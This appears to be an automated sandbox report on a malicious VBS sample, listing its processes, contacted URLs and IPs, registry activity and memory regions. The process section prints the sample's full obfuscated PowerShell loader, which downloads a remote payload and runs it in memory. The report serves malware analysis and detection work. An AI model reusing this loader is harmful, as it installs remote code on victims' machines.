Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
2THp7fwNQD.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5vpljo5.x3n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdile2in.kkw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smtk15xl.sry.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn3lldqo.qmf.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l;
CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+'
CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t);
CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6,
ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39)
| &( $ENv:CoMspEC[4,24,25]-jOiN'')"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.111.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
http://107.172.130.147
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://microsoft.co
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt94l;
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://107.172.130.147/500/RSSTT.txt
|
107.172.130.147
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
raw.githubusercontent.com
|
185.199.111.133
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
107.172.130.147
|
unknown
|
United States
|
||
|
185.199.111.133
|
raw.githubusercontent.com
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFE165E6000
|
trusted library allocation
|
page read and write
|
||
|
240C8430000
|
heap
|
page read and write
|
||
|
240CA1DA000
|
heap
|
page read and write
|
||
|
D8285B7000
|
stack
|
page read and write
|
||
|
E3AFE78000
|
stack
|
page read and write
|
||
|
2072C95B000
|
trusted library allocation
|
page read and write
|
||
|
2072B408000
|
trusted library allocation
|
page read and write
|
||
|
240CA2B1000
|
heap
|
page read and write
|
||
|
240CA445000
|
heap
|
page read and write
|
||
|
1F9F2A66000
|
heap
|
page read and write
|
||
|
20743130000
|
heap
|
page read and write
|
||
|
E3AFEF9000
|
stack
|
page read and write
|
||
|
1F9F2B87000
|
heap
|
page execute and read and write
|
||
|
E3B00FF000
|
stack
|
page read and write
|
||
|
D827FFE000
|
stack
|
page read and write
|
||
|
1F9F3050000
|
heap
|
page read and write
|
||
|
2072C02D000
|
trusted library allocation
|
page read and write
|
||
|
20729042000
|
heap
|
page read and write
|
||
|
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
|
1F9DA9B3000
|
trusted library allocation
|
page read and write
|
||
|
240CA363000
|
heap
|
page read and write
|
||
|
20729084000
|
heap
|
page read and write
|
||
|
240CA21E000
|
heap
|
page read and write
|
||
|
1F9D8A99000
|
heap
|
page read and write
|
||
|
207292C0000
|
heap
|
page read and write
|
||
|
240C847A000
|
heap
|
page read and write
|
||
|
E3AFDF7000
|
stack
|
page read and write
|
||
|
240CA1E1000
|
heap
|
page read and write
|
||
|
7FFE16870000
|
trusted library allocation
|
page read and write
|
||
|
1F9D8A30000
|
heap
|
page read and write
|
||
|
7FFE16730000
|
trusted library allocation
|
page read and write
|
||
|
E3AFBFE000
|
stack
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
7FFE166F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE165D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
|
1F9D8B16000
|
heap
|
page read and write
|
||
|
1F9F2B80000
|
heap
|
page execute and read and write
|
||
|
D827F7E000
|
stack
|
page read and write
|
||
|
240C84DD000
|
heap
|
page read and write
|
||
|
1F9DA9B6000
|
trusted library allocation
|
page read and write
|
||
|
1F9D89E0000
|
heap
|
page read and write
|
||
|
1F9D8B18000
|
heap
|
page read and write
|
||
|
1F9D8A35000
|
heap
|
page read and write
|
||
|
20743510000
|
heap
|
page read and write
|
||
|
2073C03B000
|
trusted library allocation
|
page read and write
|
||
|
2074303C000
|
heap
|
page read and write
|
||
|
240CA351000
|
heap
|
page read and write
|
||
|
2072B413000
|
trusted library allocation
|
page read and write
|
||
|
2072CAD4000
|
trusted library allocation
|
page read and write
|
||
|
1F9DA937000
|
trusted library allocation
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
240C85C0000
|
heap
|
page read and write
|
||
|
240CA381000
|
heap
|
page read and write
|
||
|
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
|
207430E5000
|
heap
|
page read and write
|
||
|
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
|
207432FE000
|
heap
|
page read and write
|
||
|
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
|
240C84D1000
|
heap
|
page read and write
|
||
|
240CA1B0000
|
heap
|
page read and write
|
||
|
1F9DAC14000
|
trusted library allocation
|
page read and write
|
||
|
240CA233000
|
heap
|
page read and write
|
||
|
207292D0000
|
trusted library allocation
|
page read and write
|
||
|
240CA1FB000
|
heap
|
page read and write
|
||
|
2072C9A6000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16520000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
|
1F9EA8A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE166C9000
|
trusted library allocation
|
page read and write
|
||
|
2072903A000
|
heap
|
page read and write
|
||
|
7FFE16540000
|
trusted library allocation
|
page read and write
|
||
|
2072C41C000
|
trusted library allocation
|
page read and write
|
||
|
E3B007E000
|
stack
|
page read and write
|
||
|
240CA1C2000
|
heap
|
page read and write
|
||
|
240CA331000
|
heap
|
page read and write
|
||
|
1F9F2A11000
|
heap
|
page read and write
|
||
|
7FFE16760000
|
trusted library allocation
|
page read and write
|
||
|
D82847E000
|
stack
|
page read and write
|
||
|
1F9DA9C4000
|
trusted library allocation
|
page read and write
|
||
|
1F9D8900000
|
heap
|
page read and write
|
||
|
1F9F29F6000
|
heap
|
page read and write
|
||
|
2072C987000
|
trusted library allocation
|
page read and write
|
||
|
240CA338000
|
heap
|
page read and write
|
||
|
1F9D8AD8000
|
heap
|
page read and write
|
||
|
2072CD2F000
|
trusted library allocation
|
page read and write
|
||
|
240CA348000
|
heap
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
1F9DA890000
|
heap
|
page read and write
|
||
|
7FFE166DA000
|
trusted library allocation
|
page read and write
|
||
|
1F9DA9B0000
|
trusted library allocation
|
page read and write
|
||
|
D82883E000
|
stack
|
page read and write
|
||
|
20729000000
|
heap
|
page read and write
|
||
|
1F9EA8B0000
|
trusted library allocation
|
page read and write
|
||
|
20729048000
|
heap
|
page read and write
|
||
|
E3AFC7E000
|
stack
|
page read and write
|
||
|
7FFE16702000
|
trusted library allocation
|
page read and write
|
||
|
240CA212000
|
heap
|
page read and write
|
||
|
20729086000
|
heap
|
page read and write
|
||
|
20729040000
|
heap
|
page read and write
|
||
|
1F9DA8BB000
|
trusted library allocation
|
page read and write
|
||
|
1F9F29B0000
|
heap
|
page read and write
|
||
|
D82930E000
|
stack
|
page read and write
|
||
|
7FFE165EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
240CA264000
|
heap
|
page read and write
|
||
|
E3AFF7E000
|
stack
|
page read and write
|
||
|
207292C5000
|
heap
|
page read and write
|
||
|
240CA23F000
|
heap
|
page read and write
|
||
|
1F9F2A6C000
|
heap
|
page read and write
|
||
|
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
|
1F9DA90A000
|
trusted library allocation
|
page read and write
|
||
|
240CA1B2000
|
heap
|
page read and write
|
||
|
E3AFA7F000
|
stack
|
page read and write
|
||
|
240CA1BA000
|
heap
|
page read and write
|
||
|
1F9DAEA6000
|
trusted library allocation
|
page read and write
|
||
|
7FFE168E3000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16533000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F9DAEB0000
|
trusted library allocation
|
page read and write
|
||
|
2072B243000
|
trusted library allocation
|
page read and write
|
||
|
D8284F9000
|
stack
|
page read and write
|
||
|
E3AFD79000
|
stack
|
page read and write
|
||
|
20728FA0000
|
heap
|
page read and write
|
||
|
1F9D8AEE000
|
heap
|
page read and write
|
||
|
D82853F000
|
stack
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
240CA363000
|
heap
|
page read and write
|
||
|
240C83F0000
|
heap
|
page read and write
|
||
|
240C847A000
|
heap
|
page read and write
|
||
|
7FFE16720000
|
trusted library allocation
|
page execute and read and write
|
||
|
2072B415000
|
trusted library allocation
|
page read and write
|
||
|
240CA22B000
|
heap
|
page read and write
|
||
|
7FFE16540000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16534000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
|
240CA21B000
|
heap
|
page read and write
|
||
|
EADF0FA000
|
stack
|
page read and write
|
||
|
1F9DAD94000
|
trusted library allocation
|
page read and write
|
||
|
240C84DD000
|
heap
|
page read and write
|
||
|
20729230000
|
trusted library allocation
|
page read and write
|
||
|
240C83D0000
|
heap
|
page read and write
|
||
|
2073B63B000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16790000
|
trusted library allocation
|
page read and write
|
||
|
D82873F000
|
stack
|
page read and write
|
||
|
240C841A000
|
heap
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
240CA1E1000
|
heap
|
page read and write
|
||
|
240CA1FD000
|
heap
|
page read and write
|
||
|
7FFE16910000
|
trusted library allocation
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
1F9F2A94000
|
heap
|
page read and write
|
||
|
E3AFDFE000
|
stack
|
page read and write
|
||
|
207292CA000
|
heap
|
page read and write
|
||
|
EADFAFB000
|
stack
|
page read and write
|
||
|
240CA322000
|
heap
|
page read and write
|
||
|
240CA1CE000
|
heap
|
page read and write
|
||
|
240CA381000
|
heap
|
page read and write
|
||
|
7FFE165E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
|
20729009000
|
heap
|
page read and write
|
||
|
20729210000
|
trusted library allocation
|
page read and write
|
||
|
240CA238000
|
heap
|
page read and write
|
||
|
7FFE167A0000
|
trusted library allocation
|
page read and write
|
||
|
240CA20F000
|
heap
|
page read and write
|
||
|
7FFE16524000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
|
240C8427000
|
heap
|
page read and write
|
||
|
2073B31B000
|
trusted library allocation
|
page read and write
|
||
|
207290C5000
|
heap
|
page read and write
|
||
|
240C83B0000
|
heap
|
page read and write
|
||
|
2072B44F000
|
trusted library allocation
|
page read and write
|
||
|
EADF5FE000
|
stack
|
page read and write
|
||
|
20729240000
|
heap
|
page readonly
|
||
|
7FFE16616000
|
trusted library allocation
|
page execute and read and write
|
||
|
D8282FD000
|
stack
|
page read and write
|
||
|
D827EF3000
|
stack
|
page read and write
|
||
|
7FFE16720000
|
trusted library allocation
|
page read and write
|
||
|
240CA275000
|
heap
|
page read and write
|
||
|
7FFE165F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F9DA9C1000
|
trusted library allocation
|
page read and write
|
||
|
240CA1C7000
|
heap
|
page read and write
|
||
|
240CA1D5000
|
heap
|
page read and write
|
||
|
7FFE168C3000
|
trusted library allocation
|
page read and write
|
||
|
2072B62D000
|
trusted library allocation
|
page read and write
|
||
|
240CA330000
|
heap
|
page read and write
|
||
|
20743150000
|
heap
|
page read and write
|
||
|
7FFE16780000
|
trusted library allocation
|
page read and write
|
||
|
E3AFFFE000
|
stack
|
page read and write
|
||
|
240CA1B1000
|
heap
|
page read and write
|
||
|
20743270000
|
heap
|
page read and write
|
||
|
207432BC000
|
heap
|
page read and write
|
||
|
7FFE16730000
|
trusted library allocation
|
page read and write
|
||
|
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
|
20728FC0000
|
heap
|
page read and write
|
||
|
D8287BE000
|
stack
|
page read and write
|
||
|
240C8426000
|
heap
|
page read and write
|
||
|
EADF1FE000
|
stack
|
page read and write
|
||
|
240CA267000
|
heap
|
page read and write
|
||
|
207292F0000
|
heap
|
page execute and read and write
|
||
|
1F9D8B59000
|
heap
|
page read and write
|
||
|
D82938D000
|
stack
|
page read and write
|
||
|
7FFE168B0000
|
trusted library allocation
|
page read and write
|
||
|
240C8486000
|
heap
|
page read and write
|
||
|
D8283FE000
|
stack
|
page read and write
|
||
|
7FFE16780000
|
trusted library allocation
|
page read and write
|
||
|
EADF2FE000
|
stack
|
page read and write
|
||
|
7FFE16710000
|
trusted library allocation
|
page execute and read and write
|
||
|
240CA325000
|
heap
|
page read and write
|
||
|
240CA323000
|
heap
|
page read and write
|
||
|
7FFE16760000
|
trusted library allocation
|
page read and write
|
||
|
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
1F9D8A00000
|
heap
|
page read and write
|
||
|
240CA1EE000
|
heap
|
page read and write
|
||
|
7FFE16650000
|
trusted library allocation
|
page execute and read and write
|
||
|
240CA22E000
|
heap
|
page read and write
|
||
|
20743660000
|
trusted library section
|
page read and write
|
||
|
7FFE1657C000
|
trusted library allocation
|
page execute and read and write
|
||
|
240CA339000
|
heap
|
page read and write
|
||
|
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
|
2072C725000
|
trusted library allocation
|
page read and write
|
||
|
1F9F2AB0000
|
heap
|
page execute and read and write
|
||
|
E3B017C000
|
stack
|
page read and write
|
||
|
240CA3B0000
|
heap
|
page read and write
|
||
|
2072B010000
|
heap
|
page execute and read and write
|
||
|
240CA363000
|
heap
|
page read and write
|
||
|
E3AF78E000
|
stack
|
page read and write
|
||
|
1F9DA8A1000
|
trusted library allocation
|
page read and write
|
||
|
207432D7000
|
heap
|
page read and write
|
||
|
240CA1BD000
|
heap
|
page read and write
|
||
|
240CA230000
|
heap
|
page read and write
|
||
|
1F9F2C90000
|
heap
|
page read and write
|
||
|
7FFE16606000
|
trusted library allocation
|
page execute and read and write
|
||
|
20728F90000
|
heap
|
page read and write
|
||
|
2073B021000
|
trusted library allocation
|
page read and write
|
||
|
1F9D8AD4000
|
heap
|
page read and write
|
||
|
207430FE000
|
heap
|
page read and write
|
||
|
7FFE166D9000
|
trusted library allocation
|
page read and write
|
||
|
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
|
240C9E60000
|
heap
|
page read and write
|
||
|
240CA1B4000
|
heap
|
page read and write
|
||
|
1F9F29FC000
|
heap
|
page read and write
|
||
|
240CA1C9000
|
heap
|
page read and write
|
||
|
7FFE1653B000
|
trusted library allocation
|
page read and write
|
||
|
E3AF7CE000
|
stack
|
page read and write
|
||
|
1F9DAD6B000
|
trusted library allocation
|
page read and write
|
||
|
20729300000
|
heap
|
page read and write
|
||
|
240CA384000
|
heap
|
page read and write
|
||
|
7FFE1654B000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16523000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE16640000
|
trusted library allocation
|
page execute and read and write
|
||
|
2073B092000
|
trusted library allocation
|
page read and write
|
||
|
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
2072AE70000
|
heap
|
page read and write
|
||
|
2072B539000
|
trusted library allocation
|
page read and write
|
||
|
7FFE168A0000
|
trusted library allocation
|
page read and write
|
||
|
2074307E000
|
heap
|
page read and write
|
||
|
7FFE166D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
|
240C84D2000
|
heap
|
page read and write
|
||
|
240CA3B1000
|
heap
|
page read and write
|
||
|
240CA257000
|
heap
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
240CA233000
|
heap
|
page read and write
|
||
|
2072903C000
|
heap
|
page read and write
|
||
|
240C84DD000
|
heap
|
page read and write
|
||
|
7FFE1653D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2072B425000
|
trusted library allocation
|
page read and write
|
||
|
7FFE168EB000
|
trusted library allocation
|
page read and write
|
||
|
7FFE166EA000
|
trusted library allocation
|
page read and write
|
||
|
240CA339000
|
heap
|
page read and write
|
||
|
7FFE16522000
|
trusted library allocation
|
page read and write
|
||
|
240CA444000
|
heap
|
page read and write
|
||
|
1F9EA912000
|
trusted library allocation
|
page read and write
|
||
|
240CA363000
|
heap
|
page read and write
|
||
|
1F9D8A90000
|
heap
|
page read and write
|
||
|
1F9DA9FD000
|
trusted library allocation
|
page read and write
|
||
|
1F9DA350000
|
trusted library allocation
|
page read and write
|
||
|
7FFE166D1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE1652D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2072C70C000
|
trusted library allocation
|
page read and write
|
||
|
1F9F2A9E000
|
heap
|
page read and write
|
||
|
240CA1BD000
|
heap
|
page read and write
|
||
|
1F9DA8EC000
|
trusted library allocation
|
page read and write
|
||
|
2072CC66000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
|
240CA267000
|
heap
|
page read and write
|
||
|
7FFE16712000
|
trusted library allocation
|
page read and write
|
||
|
EADF8FE000
|
stack
|
page read and write
|
||
|
240C84D0000
|
heap
|
page read and write
|
||
|
2072B0A1000
|
trusted library allocation
|
page read and write
|
||
|
240CA1B2000
|
heap
|
page read and write
|
||
|
240CA1B9000
|
heap
|
page read and write
|
||
|
1F9F2BB0000
|
heap
|
page read and write
|
||
|
20743240000
|
heap
|
page execute and read and write
|
||
|
7FFE16700000
|
trusted library allocation
|
page execute and read and write
|
||
|
2072C712000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16880000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16790000
|
trusted library allocation
|
page read and write
|
||
|
2073B030000
|
trusted library allocation
|
page read and write
|
||
|
E3AF683000
|
stack
|
page read and write
|
||
|
1F9DA9C7000
|
trusted library allocation
|
page read and write
|
||
|
E3AFAFE000
|
stack
|
page read and write
|
||
|
7FFE167A0000
|
trusted library allocation
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
|
240CA290000
|
heap
|
page read and write
|
||
|
1F9D8A50000
|
heap
|
page read and write
|
||
|
1F9D8ADD000
|
heap
|
page read and write
|
||
|
240CA1FA000
|
heap
|
page read and write
|
||
|
1F9F2A74000
|
heap
|
page read and write
|
||
|
7FFE16532000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165D0000
|
trusted library allocation
|
page read and write
|
||
|
240CA339000
|
heap
|
page read and write
|
||
|
7FFE166E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20729250000
|
trusted library allocation
|
page read and write
|
||
|
2072B421000
|
trusted library allocation
|
page read and write
|
||
|
D82863D000
|
stack
|
page read and write
|
||
|
7FFE166C0000
|
trusted library allocation
|
page read and write
|
||
|
2072C732000
|
trusted library allocation
|
page read and write
|
||
|
240CA1E6000
|
heap
|
page read and write
|
||
|
1F9D8B64000
|
heap
|
page read and write
|
||
|
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
|
1F9DA8F1000
|
trusted library allocation
|
page read and write
|
||
|
240CA1DE000
|
heap
|
page read and write
|
||
|
240CA1D3000
|
heap
|
page read and write
|
||
|
1F9DA370000
|
trusted library allocation
|
page read and write
|
||
|
1F9DA870000
|
heap
|
page execute and read and write
|
||
|
240CA25C000
|
heap
|
page read and write
|
||
|
240C841B000
|
heap
|
page read and write
|
||
|
7FFE166F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F9DA330000
|
trusted library allocation
|
page read and write
|
||
|
D82893B000
|
stack
|
page read and write
|
||
|
240CA1BA000
|
heap
|
page read and write
|
||
|
2072C736000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
|
207432A2000
|
heap
|
page read and write
|
||
|
240CA25F000
|
heap
|
page read and write
|
||
|
240C8486000
|
heap
|
page read and write
|
||
|
240CA350000
|
heap
|
page read and write
|
||
|
7FFE16870000
|
trusted library allocation
|
page read and write
|
||
|
2072C762000
|
trusted library allocation
|
page read and write
|
||
|
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16890000
|
trusted library allocation
|
page read and write
|
||
|
207292F7000
|
heap
|
page execute and read and write
|
||
|
240CA24B000
|
heap
|
page read and write
|
||
|
2072B021000
|
trusted library allocation
|
page read and write
|
||
|
20729305000
|
heap
|
page read and write
|
||
|
E3AF70E000
|
stack
|
page read and write
|
||
|
240CA227000
|
heap
|
page read and write
|
||
|
240CA1E9000
|
heap
|
page read and write
|
||
|
240CA32E000
|
heap
|
page read and write
|
||
|
7FFE168C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
|
E3AFCFF000
|
stack
|
page read and write
|
||
|
2072C75B000
|
trusted library allocation
|
page read and write
|
||
|
EADF4FF000
|
stack
|
page read and write
|
||
|
7FFE16530000
|
trusted library allocation
|
page read and write
|
||
|
2072C9E5000
|
trusted library allocation
|
page read and write
|
||
|
EADF9FF000
|
stack
|
page read and write
|
||
|
2072AE8C000
|
heap
|
page read and write
|
||
|
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE166D2000
|
trusted library allocation
|
page read and write
|
||
|
7FFE166E1000
|
trusted library allocation
|
page read and write
|
||
|
240CA348000
|
heap
|
page read and write
|
||
|
240CA345000
|
heap
|
page read and write
|
||
|
207291D0000
|
heap
|
page read and write
|
||
|
E3AFB7D000
|
stack
|
page read and write
|
||
|
240CA269000
|
heap
|
page read and write
|
||
|
2072CD2B000
|
trusted library allocation
|
page read and write
|
||
|
240CA2B0000
|
heap
|
page read and write
|
||
